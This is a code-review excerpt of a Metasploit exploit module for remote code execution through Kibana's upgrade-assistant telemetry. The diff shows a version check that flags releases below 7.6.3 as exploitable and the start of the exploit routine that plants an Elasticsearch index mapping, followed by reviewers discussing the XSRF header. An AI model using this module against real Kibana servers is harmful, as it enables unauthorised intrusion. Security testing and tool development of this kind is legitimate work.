modules/exploits/linux/http/kibana_upgrade_assistant_telemetry_rce.rb

```diff
@@ -0,0 +1,358 @@
+                    }
+                  }
+                }
+              }
+            },
+            'ui_open' => {
+              'properties' => {
+                'cluster' => {
+                  'type' => 'long',
+                  'null_value' => 0
+                },
+                'indices' => {
+                  'type' => 'long',
+                  'null_value' => 0
+                },
+                'overview' => {
+                  'type' => 'long',
+                  'null_value' => 0
+                }
+              }
+            },
+            'ui_reindex' => {
+              'properties' => {
+                'close' => {
+                  'type' => 'long',
+                  'null_value' => 0
+                },
+                'open' => {
+                  'type' => 'long',
+                  'null_value' => 0
+                },
+                'start' => {
+                  'type' => 'long',
+                  'null_value' => 0
+                },
+                'stop' => {
+                  'type' => 'long',
+                  'null_value' => 0
+                }
+              }
+            }
+          }
+        }
+      }
+    }
+  end
+
+  def check
+    if target == targets[0] # elastic
+      return CheckCode::Unknown('Unable to determine Kibana version from Elastic database')
+    end
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'app', 'kibana'),
+      'method' => 'GET',
+      'keep_cookies' => true
+    )
+    return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
+    return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
+
+    # this pulls a big JSON blob that we need as it has the version
+    unless %r{<kbn-injected-metadata data="([^"]+)"></kbn-injected-metadata>} =~ res.body
+      return Exploit::CheckCode::Safe("#{peer} - Unexpected response, unable to determine version")
+    end
+
+    version_json = CGI.unescapeHTML(Regexp.last_match(1))
+
+    begin
+      json_body = JSON.parse(version_json)
+    rescue JSON::ParserError
+      return Exploit::CheckCode::Safe("#{peer} - Unexpected response, unable to determine version")
+    end
+
+    return Exploit::CheckCode::Safe("#{peer} - Unexpected response, unable to determine version") if json_body['version'].nil?
+
+    @version = json_body['version']
+
+    if Rex::Version.new(@version) < Rex::Version.new('7.6.3')
+      return CheckCode::Appears("Exploitable Version Detected: #{@version}")
+    end
+
+    CheckCode::Safe("Unexploitable Version Detected: #{@version}")
+  end
+
+  def exploit
+    @clean = true
+    if target == targets[0] # elastic
+      print_status('Creating index')
+      elastic_create_index
+      print_status('Sending index map')
+      elastic_send_mapping
+    else
+      # xsrf for unlicensed kibana seems to just be kibana... at least for 7.6.2
```

Comment:
This is a little concerning. Does this mean that the module won't work if the target Kibana instance is licensed?

Reply:
Unsure, I don't have an elastic license (which gives you a kibana license) to test against.

Reply:
https://discuss.elastic.co/t/where-can-i-get-the-correct-kbn-xsrf-value-for-my-plugin-http-requests/158725/3

looks like the answer may be to just have anything